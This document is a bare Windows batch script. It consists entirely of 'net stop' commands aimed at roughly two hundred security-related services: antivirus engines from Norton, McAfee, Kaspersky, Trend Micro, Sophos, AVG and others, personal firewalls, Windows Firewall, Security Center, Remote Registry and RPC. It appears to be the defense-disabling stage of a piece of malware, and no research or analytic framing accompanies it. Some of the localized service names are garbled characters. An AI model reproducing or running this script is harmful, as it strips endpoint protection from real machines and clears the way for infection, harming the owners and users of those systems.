@echo off
net stop "Norton AntiVirus Server"
net stop "Norton AntiVirus Auto Protect Service"
net stop "Norton Unerase Protection"
net stop "NProtectService"
net stop "Service Norton AntiVirus Auto-Protect"
net stop "Virus Chaser Spider NT"
net stop "navapsvc"
net stop "SAVScan"
net stop "DefWatch"
net stop "Norton AntiVirus Client"
net stop "Symantec AntiVirus Client"
net stop "Norton Program Scheduler"
net stop "Symantec AntiVirus ノめ狠"
net stop "Norton AntiVirus ???"
net stop "Norton AntiVirus ??????"
net stop "Norton AntiVirus 笆ň臔狝叭"
net stop "Norton AntiVirus 自动防护服务"
net stop "Norton AntiVirus Auto-Protect szolg醠tat醩"
net stop "ScriptBlocking Service"
net stop "NAV Alert"
net stop "NAV Auto-Protect"
net stop "Norton Program Scheduler"
net stop "Panda Process Protection Service"
net stop "Panda anti-virus service"
net stop "Usluga Auto-Protect w programie Norton AntiVirus"
net stop "McShield"
net stop "McTaskManager"
net stop "McAfee.com VirusScan Online Realtime Engine"
net stop "McAfee SecurityCenter Update Manager"
net stop "McAfee.com McShield"
net stop "McAfee Firewall"
net stop "AVSync Manager"
net stop "AvSynMgr"
net stop "Network Associates McShield"
net stop "McAfee Framework Service"
net stop "McAfeeFramework"
net stop "Network Associates Task Manager"
net stop "McAfee Alert Manager"
net stop "FireSvc"
net stop "Symantec AntiVirus Client"
net stop "Kingsoft AntiVirus Service"
net stop "BlackICE"
net stop "RapApp"
net stop "F-Secure Authentication Agent"
net stop "F-Secure BackWeb LAN Access"
net stop "F-Secure Gatekeeper Handler Starter"
net stop "F-Secure Management Agent"
net stop "F-Secure Network Request Broker"
net stop "PC-cillin PersonalFirewall"
net stop "KAV Monitor Service"
net stop "AVP Control Centre Service"
net stop "Trend NT Realtime Service"
net stop "Trend Micro Personal Firewall"
net stop "Trend Micro Proxy Service"
net stop "avast! iAVS4 Control Service"
net stop "avast! Antivirus"
net stop "Trend ServerProtect"
net stop "KVSrvXP_1"
net stop "KVSrvXp"
net stop "KVSrvXP"
net stop "KVSrvXp_2"
net stop "AntiVir Service"
net stop "AntiVir Update"
net stop "Trend Micro Personal Firewall"
net stop "Symantec Proxy Service"
net stop "Symantec Event Manager"
net stop "Norton Internet Security Accounts Manager"
net stop "Norton AntiVirus Corporate Edition"
net stop "ViRobot Professional Monitoring"
net stop "ViRobot Expert Monitoring"
net stop "ViRobot Lite Monitoring"
net stop "PC-cillin Personal Firewall"
net stop "McAfee Agent"
net stop "SyGateService"
net stop "Sygate Personal Firewall Pro"
net stop "Sophos Anti-Virus"
net stop "Sophos Anti-Virus Network"
net stop "Ahnlab Task Scheduler"
net stop "eTrust Antivirus Job Server"
net stop "eTrust Antivirus Realtime Server"
net stop "eTrust Antivirus RPC Server"
net stop "V3MonNT"
net stop "V3MonSvc"
net stop "Quick Heal Online Protection"
net stop "Symantec Proxy Service"
net stop "Symantec Event Manager"
net stop "Norton Internet Security Accounts Manager"
net stop "Ahnlab Task Scheduler"
net stop "Kaspersky"
net stop "Kaspersky Anti-Virus"
net stop "Kaspersky Antivirus"
net stop "Kaspersky Client"
net stop "kaspersky auto protect service"
net stop "kav"
net stop "AVG6 Service"
net stop "AVP32"
net stop "LOCKDOWN2000"
net stop "AVP.EXE"
net stop "CFINET32"
net stop "CFINET"
net stop "ICMON"
net stop "SAFEWEB"
net stop "WEBSCANX"
net stop "ANTIVIR"
net stop "MCAFEE"
net stop "NORTON"
net stop "NVC95"
net stop "FP-WIN"
net stop "IOMON98"
net stop "PCCWIN98"
net stop "F-PROT95"
net stop "F-STOPW"
net stop "PVIEW95"
net stop "NAVWNT"
net stop "NAVRUNR"
net stop "NAVLU32"
net stop "NAVAPSVC"
net stop "NISUM"
net stop "SYMPROXYSVC"
net stop "RESCUE32"
net stop "NISSERV"
net stop "ATRACK"
net stop "IAMAPP"
net stop "LUCOMSERVER"
net stop "LUALL"
net stop "NMAIN"
net stop "NAVW32"
net stop "NAVAPW32"
net stop "VSSTAT"
net stop "VSHWIN32"
net stop "AVSYNMGR"
net stop "AVCONSOL"
net stop "WEBTRAP"
net stop "POP3TRAP"
net stop "PCCMAIN"
net stop "PCCIOMON"
net stop "Telenet"
net stop telenet
net stop "spiderui"
net stop "spidernt"
net stop "Turbo Vaccine Monitoring Service"
net stop "MonSvcNT"
net stop "rising process communication center"
net stop "rising realtime monitor service"
net stop "OfficeScanNT Monitor"
net stop "RemoteAgent"
net stop "Ahnlab Task Scheduler"
net stop "Panda Antivirus"
net stop "ZoneAlarm"
net stop "Detector de OfficeScanNT"
net stop "Norton Internet Security Proxy Srvice"
net stop "Norton Internet Security service"
net stop "Sygate Personal Firewall"
net stop "Security Center"
net stop "Windows Firewall"
net stop "Windows Internet Connection Sharing(ICS)"
net stop "Background Intelligent Transfer Service"
net stop "System Event Notification"
net stop "AVG7 Alert Manager Server"
net stop "AVG7 Update Service"
net stop "InVircible Scheduler"
net stop "kavsvc"
net stop "Trend ServerProtect Agent"
net stop "nkbmonitor"
net stop "vcrmon"
net stop "kavpf"
net stop "service"
net stop "SecureServ"
net stop "userlist"
net stop "security"
net stop "Remote Registry Service"
net stop "Computer Browser"
net stop "server" 
net stop "REMOTE PROCEDURE CALL"
net stop "REMOTE PROCEDURE CALL SERVICE"
net stop "Remote Access Connection Manager"
net stop "messenger"
net stop "netbios"
net stop "tlntsvr"
net stop "rpchost"
net stop "serv-u"
net stop "InternetFirewallProc"
net stop "AutoUpdate"
net stop "asnetclient"
net stop "ntsysvers"
net stop "ms-java"
net stop "anti-trojan"
net stop "antivirus"
net stop "mssvc"
net stop "Kaspersky Lab"
net stop "kaspersky anti-virus professional"
net stop "kaspersky antivirus professional"
net stop "kaspersky anti-virus pro"
net stop "kaspersky antivirus pro"
net stop "kaspersky anti-virus personal"
net stop "kaspersky antivirus personal"
net stop "events"
net stop "Dll32"
net stop "InternetFirewallProces"
net stop "SysteemSecurityDll"
net stop "wins" 
net stop "config"
net stop "secure"
net stop "spoolnt"
net stop "netsvcs"
net stop "secure32"
net stop "net33"
net stop "net37"
net stop "kaspersky anti-virus personal"
net stop "avp"
net stop "avg"